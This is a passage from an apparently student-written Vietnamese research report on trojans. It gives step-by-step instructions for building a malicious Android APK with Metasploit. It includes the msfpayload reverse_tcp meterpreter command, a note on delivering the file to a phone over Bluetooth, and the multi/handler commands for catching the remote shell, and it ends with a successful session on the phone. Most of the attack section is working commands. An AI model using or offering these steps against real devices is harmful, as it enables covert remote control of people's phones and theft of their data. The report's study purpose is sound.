Tạo APK có chứa mã độc bằng KaLi Linux

Một phần của tài liệu Báo Cáo nghiên cứu trojan ,malware (Trang 56)

3. Hack Android trên mạng LAN

3.2.Tạo APK có chứa mã độc bằng KaLi Linux

Trước khi tiến hành ta nên thiết lập phần Network như sau:

Vào VM => Settings... ở thanh lựa chọn của VMware. Tiếp theo, chọn Netword Adapter Bridged. Và lưu lại.

Hình 6.9. Setting VMware.

SVTT: Võ Đình Thông Page 46 Như vậy đã hoàn thành sơ bộ về cài đặt mạng cho máy ảo. Ta tiến hành tạo file APK chưa mã độc để đưa vào máy điện thoại Android.

Đầu tiên, ta vào máy ảo có cài sẵn Metasploit để lấy địa chỉ IP của máy ảo này. Ở đây, máy mình cài là máy WinXP, nên vào CMD, gõ lệnh ipconfig.

Ta thấy địa chỉ IP ở đây là 192.168.0.120

Hình 6.11. Lấy địa chỉ IP của máy cài Metasploit.

Tiếp theo, tại Terminal của KaLi Linux, gõ lệnh:

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.120 lport=4444 R> /root/Desktop/Hack.app

SVTT: Võ Đình Thông Page 47 Với IP là địa chỉ IP của máy ảo cài Metasploit. Với lệnh trên, thì ta cần quan tâm 2 thông số lhostlport. Sau khi lệnh này kết thúc, ta được file Hack.apk tại màn hình Desktop.

Như vậy, ta đã tạo ra file cài đặt cho Android chứa mã độc. Nhiệm vụ tiếp theo, là đưa mã độc này vào trong máy điện thoại có hệ điều hành Android. Nên nhớ, chỉ có thể hack được điện thoại có chung mạng LAN.

Ta tiến hành gửi file HACK.APK này vào điện thoại. Có nhiều cách, thì ở đây mình sẽ gửi Bluetooth.

Hình 6.13. Đưa file Hack.apk vào điện thoại Android.

Cộng việc tiếp theo của ta, là sẽ tạo một Handler xử lý dữ liệu truyền về, từ máy Android bị nhiễm mã độc. Ta vào Máy ảo đã cài Metasploit.

Khởi động Metasploit console bằng cách vào Stast > All Programs > Metasploit

> MetasploitConsole. Và gõ lệnh sau use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.120nhập địa chỉ IP giống với địa chỉ IP của máy ảo chứa Metasploit.

set port 4444– nhập port giống với port mà ta đã set khi tạo file Hack.apk.

SVTT: Võ Đình Thông Page 48

Hình 6.14. Tạo Handler xử lý thông tin.

Sau khi kết thúc câu lệnh. Ta có thể coi lại cách setup bằng cách gõ lệnh Show options. Nếu không có gì sai xót, thì ta kết thúc bằng lệnh RUN.

Hình 6.15. Run Handler.

Như vậy ta đã tạo thành công Handler để xử lý thông tin tại địa chỉ:

192.168.0.120:4444. Công việc bây giờ là vào máy Android đã được cài đặt mã

SVTT: Võ Đình Thông Page 49 Nếu xuất hiện như hình dưới đây, thì ta đã hoàn thành, cài đặt, và hack máy Android trên mạng LAN. Kiểm tra thông tin máy đã bị hack bằng lệnh Sysinfo.

Hình 6.16. Hack thành công điện thoại Android trên mạng LAN.

Ta đã tạo được kết nối tới máy điện thoại Android có địa chỉ IP:

192.168.0.117:42701 vào lúc 2014-08-09 10:09:35 +7000. Thông tin của điện thoại, với hệ điều hành: Linux 3.4.10 – gf33c859.

Thì ta thấy ở đây, địa chỉ IP của máy ảo và điện thoại Android chính là 2 địa chỉ cùng thuộc một mạng LAN 192.168.0.

Phần tiếp theo, của công việc là “dạo chơi” trên điện thoại đã nhiễm mã độc bằng Metasploit. Mình sẽ trình bày chi tiết hơn ở Chương tiếp theo: Hack điện thoại thông qua VPS. (adsbygoogle = window.adsbygoogle || []).push({});

SVTT: Võ Đình Thông Page 50

XÂM NHẬP VÀO ANDROID THÔNG QUA CHƯƠNG 7.

INTERNET TỪ VPS

Một phần của tài liệu Báo Cáo nghiên cứu trojan ,malware (Trang 56)